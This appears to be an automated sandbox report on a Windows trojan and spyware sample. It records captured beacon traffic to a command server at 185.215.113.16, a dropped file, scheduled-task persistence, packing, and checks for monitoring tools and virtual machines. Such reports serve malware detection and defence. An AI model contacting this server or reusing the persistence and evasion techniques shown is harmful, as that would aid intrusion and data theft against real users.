Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown DNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006ABD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_006ABD60
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3248149591.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
Source: axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php32
Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpZ
Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpc
Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp;
Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx
Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy

System Summary

barindex
Source: EXyAlLKIck.exe Static PE information: section name:
Source: EXyAlLKIck.exe Static PE information: section name: .idata
Source: EXyAlLKIck.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006E3068 7_2_006E3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006AE440 7_2_006AE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006A4CF0 7_2_006A4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006D7D83 7_2_006D7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006E765B 7_2_006E765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006A4AF0 7_2_006A4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006E777B 7_2_006E777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006E8720 7_2_006E8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006E6F09 7_2_006E6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006E2BD0 7_2_006E2BD0
Source: EXyAlLKIck.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: EXyAlLKIck.exe Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: EXyAlLKIck.exe Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: axplong.exe.0.dr Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: EXyAlLKIck.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File read: C:\Users\user\Desktop\EXyAlLKIck.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\EXyAlLKIck.exe "C:\Users\user\Desktop\EXyAlLKIck.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: EXyAlLKIck.exe Static file information: File size 1878528 > 1048576
Source: EXyAlLKIck.exe Static PE information: Raw size of wfabfqoe is bigger than: 0x100000 < 0x199000

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Unpacked PE file: 0.2.EXyAlLKIck.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 7.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: EXyAlLKIck.exe Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: EXyAlLKIck.exe Static PE information: section name:
Source: EXyAlLKIck.exe Static PE information: section name: .idata
Source: EXyAlLKIck.exe Static PE information: section name:
Source: EXyAlLKIck.exe Static PE information: section name: wfabfqoe
Source: EXyAlLKIck.exe Static PE information: section name: qxvdwait
Source: EXyAlLKIck.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: wfabfqoe
Source: axplong.exe.0.dr Static PE information: section name: qxvdwait
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006BD84C push ecx; ret 7_2_006BD85F
Source: EXyAlLKIck.exe Static PE information: section name: entropy: 7.982589984423413
Source: EXyAlLKIck.exe Static PE information: section name: wfabfqoe entropy: 7.954564972616457
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.982589984423413
Source: axplong.exe.0.dr Static PE information: section name: wfabfqoe entropy: 7.954564972616457
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
